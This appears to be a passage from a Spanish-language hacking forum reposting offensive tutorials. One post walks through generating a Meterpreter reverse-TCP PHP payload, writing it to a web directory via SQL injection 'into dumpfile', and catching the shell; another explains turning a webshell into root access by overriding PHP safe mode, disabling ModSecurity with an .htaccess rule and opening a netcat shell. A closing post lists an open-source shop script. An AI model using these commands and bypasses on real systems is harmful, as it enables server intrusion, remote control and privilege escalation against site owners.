En conclusión, no importa cuan nobles sean las intenciones por las que se crea una herramienta, si esta mal diseñada o es susceptible a explotar cualquier mínimo fallo puede convertirse en una herramienta altamente destructiva.

Podéis leer el caso en detalle en el post de Panos Ipeirotis: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

FUENTE: hackplayers
#38
Hoy vamos a ver como obtener una sesión de Meteperter explotando una vulnerabilidad SQL Injectión, para recrear este ejemplo vamos a utilizar DVWA.

1. Creamos el payload:

Código: text
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=10000 R > payload.php


2. Ahora este código lo tenemos que pasar la Hexadecimal. Para ello podéis emplear los multiples aplcaciones online que hay. Yo dejo las 2 que suelo usar:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

3. El codigo quedaría algo así:

Código: text
233c3f7068700a0a6572726f725f7265706f7274696e672830...


4. Inyectamos el siguiente comando en la aplicación web:

Código: text
' union select '',0x233c3f7068700a0a6572726f725f7265706f7274696e672830... into dumpfile '/opt/lampp/htdocs/uploads/payload.php'#


5. Nos quedamos escuchando para cuando se ejecuta el payload.

Código: text
msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=10000 E



5. Ahora si nos vamos al sitio el cual hemos subido el payload (/opt/lampp/htdocs/uploads/) y lo ejecutamos tendríamos que obtener la sesión Meterpreter.

6. Si volvemos a la pantalla donde hemos dejado escuchando vemos que tenemos una sesión Meterpreter.




FUENTE: Segu-Info
#39
Hoy, me gustaría hablar básicamente de como partiendo de una webshell operativa, poder llegar a obtener una conexión al servidor bajo los máximos privilegios (superusuario).



El hecho de partir de una webshell hasta tener un control total del servidor no es solo un camino largo, sinó que también está formado por un factor a la hora de configurar y abastionar el servidor por parte de los administradores.

Partiremos de un entorno (Windows+ Apache) del que conocemos los datos gracias a un error forzado en la aplicación web. Las imágenes se han recogido en mi máquina virtual de Windows, por eso que algunas partes serán "virtuales" y no llegaremos a probarlas.


1. - El primer peldaño: Recolección de datos

Suponemos que tenemos a nuestra disposición una webshell que previamente hemos introducido en el servidor mediante algún fallo de seguridad en la aplicación web.

Debemos de recaudar la mayor cantidad de datos posibles para saber cuál es la seguridad del servidor en cuanto a directivas en la configuración (Safe Mode de php, Mod Security para Apache, etc).



Lo que más nos interesa:
- Software
- Uname -a
- Safe-mode




2. - Pruebas de concepto

Llegados a este apartado y a este punto, junto con la información recopilada, debemos de saber si tenemos posibilidad de ejecutar comandos en el servidor. Haremos un simple listado de directorios y archivos.



En caso de que funcione saltaremos al paso 4. De lo contrario tendremos una directiva impidiendo la ejecución de comandos y debemos de evadirla sea como sea.

3. - La gran evasión

¡No podemos hacer nada, el safe mode está activado! Tranquilo, hay una "solución". PHP carga la configuración desde php.ini situado en /etc/ a no ser que, en la carpeta en la cual ejecutamos la webshell exista un archivo php.ini preconfigurado y subido por nosotros.

Otro error básico es, activar el safe mode y deshabilitar las funciones de ejecución de comandos pero no deshabilitar funciones como ini_set. Así que, es posible usarlo para eliminar las funciones preconfiguradas para estar bloqueadas.

En cuanto a Mod Security es posible desactivarlo en una carpeta mediante un .htaccess. Y bueno, más de lo mismo (para Apache 2):

Código: text
<IfModule mod_security2.c>
   SecRuleEngine Off
</IfModule>




4. - Abriendo la puerta

Una vez ya hemos logrado ejecutar comandos debemos de descargar a un directorio en el cual tengamos los mayores permisos netcat. Aprovecho también para dejarlo para descarga compilado aquí.

No voy a explicar como "descargar o compilar" (y eso que una linea más arriba está preparado para windows) netcat puesto que a estas alturas debería de estar más que claro.



Ahora solo falta que nos conectemos y tendremos una shell.




5. - Haciendonos crecer

Este paso consiste en recopilar la mayor información sobre la versión del sistema operativo y buscar alguna forma de escalada de privilegios.

Lo podemos hacer mediante tareas programadas que en Windows XP se ejecutan con "demasiados" permisos, también disponemos de exploits como el PoC publicado recientemente.

En caso de un servidor Linux buscaremos un local root exploit que nos permita la escalada de privilegios o de lo contrario buscaremos una mala configuración en servicios como Apache o MySQL para llegar a ejecutar algún comando "subidito de tono". }:))


Espero que os haya gustado. ¡Gracias a todos los lectores! }:))

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Autor: p0is0n-123
#40
AlegroCart es una alternativa a la hora de crear un comercio electrónico, el script es de código abierto y está basado en PHP5. Requiere de servidor Apache y base de datos MySQL.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta User: demo  Pass: demo

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta